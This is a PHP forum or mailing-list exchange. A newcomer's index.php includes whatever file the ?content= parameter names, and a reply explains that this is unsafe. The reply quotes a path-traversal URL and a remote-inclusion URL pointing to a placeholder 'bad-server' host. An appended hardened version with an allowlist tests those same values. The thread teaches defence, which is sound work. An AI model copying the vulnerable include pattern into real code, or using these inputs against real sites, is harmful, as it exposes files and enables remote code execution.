Hi,
I'm new to PHP and I'd appreciate your advice a lot. I'm trying to use dynamic PHP links instead of plain HTML and I'm gonna use something like this:

File "index.php":

<a href=index.php?content=story.htm>story</a><br>
<a href=index.php?content=about.htm>about</a><br>
<?
if(isset($content)):
    include $content;
else:
    include "about.htm";
endif;
?>
But a guy told me it is not preferable to use this method because of security considerations. I'm sure there is a common way of building dynamic links; am I on the wrong way?
You can search the list archives for posts regarding this topic (it comes up a lot).
There are safer ways to do what you are doing. One simple way to "hack" your script as written above would be to type:
index.php?content=../some/secret/file.txt
or,
index.php?content=http://www.bad-server.com/badscript.php
in the browser's address bar.
Regards, Burhan
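
One safer way to build the same links, as an added example that is not part of the original thread: the request value is used only as a key into a fixed allowlist and never as a path. The page keys, the `PAGES` map and the `resolve_page()` helper are assumptions made for illustration.

```php
<?php
// Added example (not from the thread): hardened variant of index.php.
// PAGES, DEFAULT_PAGE and resolve_page() are hypothetical names.

// Fixed allowlist: request value => file shipped with the site.
const PAGES = [
    'story' => 'story.htm',
    'about' => 'about.htm',
];
const DEFAULT_PAGE = 'about';

/**
 * Map the untrusted ?content= value to a file from the allowlist.
 * The value is only ever an array key, never part of a path, so
 * "../" sequences and URLs cannot reach include.
 */
function resolve_page($requested): string
{
    if (is_string($requested) && array_key_exists($requested, PAGES)) {
        return PAGES[$requested];
    }
    return PAGES[DEFAULT_PAGE];
}

if (PHP_SAPI === 'cli') {
    // Self-check with constructed inputs, including the two values
    // quoted in the reply; every hostile value falls back to about.htm.
    $samples = [
        'story',
        '../some/secret/file.txt',
        'http://www.bad-server.com/badscript.php',
        ['x'],   // array input, as sent by ?content[]=x
        null,    // parameter absent
    ];
    foreach ($samples as $s) {
        printf("%-45s => %s\n", json_encode($s, JSON_UNESCAPED_SLASHES), resolve_page($s));
    }
    exit(0);
}
?>
<a href="index.php?content=story">story</a><br>
<a href="index.php?content=about">about</a><br>
<?php
// Read $_GET explicitly instead of relying on register_globals.
include __DIR__ . '/' . resolve_page($_GET['content'] ?? null);
```

Running the file from the command line prints the mapping for each sample; served over HTTP it renders the links and includes only `story.htm` or `about.htm`.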